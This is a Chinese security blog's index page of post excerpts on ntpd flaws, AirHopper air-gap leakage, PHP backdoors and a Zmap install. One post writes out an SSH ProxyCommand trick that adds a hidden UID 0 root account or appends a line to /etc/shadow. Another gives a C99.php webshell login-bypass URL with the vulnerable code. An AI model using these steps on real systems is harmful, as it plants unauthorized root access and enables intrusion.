陆羽's Blog

想要飞的更高,就要把地平线忘掉!

陆羽 发表的文章

发掘和利用ntpd漏洞

No Comments | 转载文章 | by 陆羽 | 4570 Views. | 2015-01-05, 9:46 AM
Stephen的这篇文章是Project Zero的第一篇客座文章。我们将不时的推出顶级安全研究的客座文章。这篇文章里,这些漏洞的远程利用性质以及导致远程代码执行的错误链和特性让我们印象深刻。你可能已经看到最近的ntpd漏洞披露,这篇文章由发现这一漏洞的研究者来讲述这一故事。 Chris Evans

» 阅读全文

阅读全文

AirHopper:断网状态下黑客使用FM信号监控电脑信息(含视频)

No Comments | 转载文章 | by 陆羽 | 11712 Views. | 2014-11-02, 11:22 PM

据美国科技新闻网站“瘾科技”去年底报道,德国Fraunhofer通信研究所的专家,曾经开发了一个用于概念验证的恶意攻击程序,安装在不同电脑上的多个恶意程序,可以利用扬声器和麦克风相互之间“沟通数据”,这些电脑无需存在于同一个局域网中,只需要相互距离不超过20米即可相互通信。


http://bobao.360.cn/news/detail/730.html



» 阅读全文

阅读全文

突破用户命令限制,添加root权限无限制用户

No Comments | 转载文章 | by 陆羽 | 8242 Views. | 2014-07-31, 3:45 PM
在实际渗透场景中,有很多网络设备我们拿到了root权限后ssh登陆发现有命令执行限制,这是因为ssh接口提供了一个特殊的受限制的命令外壳程序,类似busybox的感觉,他可以允许root用户对设备进行配置处理,但是不允许进行命令交互,所以相当于我们拿到的只是一个鸡肋的root用户,为了突破这种限制,我们有特别的姿势

因为开放了ssh服务,所以我们可以使用scp,但是scp是无法创建目录的,所以我们想到的第一个办法是到用户目录的.ssh下,上传公钥,然后登陆到系统无需密码,事实证明可以成功登陆,但是登陆的用户的shell默认还是在这个受限的外壳下,命令交互依旧不成功

那如何逃逸这种限制?比较好玩儿,ssh给我们提供了一个可以按照配置预期执行命令的功能,在$HOME/.ssh/ config中进行配置,我们可以达到这样的效果
我们在配置文件中预期执行添加一个新的root用户,UID为0且无限制执行命令,以此来逃逸网络设备的限制问题




config内容如下:

host ztzsb          #随便写一个host名称
hostname ip          #填写当前ip
user root     #填写当前受限用户
#ProxyCommand /bin/bash %h %p
ProxyCommand useradd -p `openssl passwd -1 -salt 'mujj' redrain` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/redrain redrain
#或者echo一个到/etc/shadow
#ProxyCommand echo "redrain:$1$mujj$NIovcyWTUzr76qHvsju0v.:10000:0:99999:7:::" >> /etc/shadow

此时,当我们使用内置的slogin就会触发这个配置

只需要scp吧这个配置文件传到我们刚才受限的用户目录的.ssh/下,登陆这个受限用户后执行

slogin -N ztzsb

就会执行配置中的命令~

阅读全文

C99.PHP webshell 绕过登陆密码漏洞

No Comments | 转载文章 | by 陆羽 | 10330 Views. | 2014-06-26, 12:06 PM
from:http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/ 

C99.php存在一个漏洞可以绕过登陆密码直接登陆的漏洞。 

http://127.0.0.1/c99.php?c99shcook[login]=0
可直接登陆。 

@extract($_REQUEST["c99shcook"]);

变量覆盖 

if ($login) { 
    if (empty($md5_pass)) { 
        $md5_pass = md5($pass); 
    } 
    if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { 
        if ($login_txt === false) { 
            $login_txt = ""; 
        } elseif (empty($login_txt)) { 
            $login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html)); 
        } 
        header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\""); 
        header("HTTP/1.0 401 Unauthorized"); 
        exit($accessdeniedmess); 
    } 
}

阅读全文

PHP Backdoors: Hidden With Clever Use of Extract Function

No Comments | 转载文章 | by 陆羽 | 15498 Views. | 2014-02-19, 10:00 AM
When a site gets compromised, one thing we know for sure is that attackers love to leave malware that allows them access back to the site; this type of malware is called a backdoor. This type of malware was named this because it allows for remote control of a compromised website in a way that bypasses appropriate authentication methods. You can update your site, change passwords, along with any of your admin procedures, and the backdoor would still be there allowing unexpected access to an attacker.

» 阅读全文

阅读全文

Centos 6.5 X64 下安装Zmap方法

1 Comment | 原创文章 | by 陆羽 | 15800 Views. | 2014-02-14, 4:35 PM

1.添加epel的YUM源,不然很多组件一会会找不到

cd /etc/yum.repo.d/
rpm —-import http://mirrors.ustc.edu.cn/fedora/epel/RPM-GPG-KEY-EPEL-6
wget https://lug.ustc.edu.cn/wiki/_export/code/mirrors/help/epel?codeblock=0 
mv epel\?codeblock\=0 epel.repo
wget https://lug.ustc.edu.cn/wiki/_export/code/mirrors/help/epel?codeblock=1 
mv epel\?codeblock\=1 epel-testing.repo

» 阅读全文

阅读全文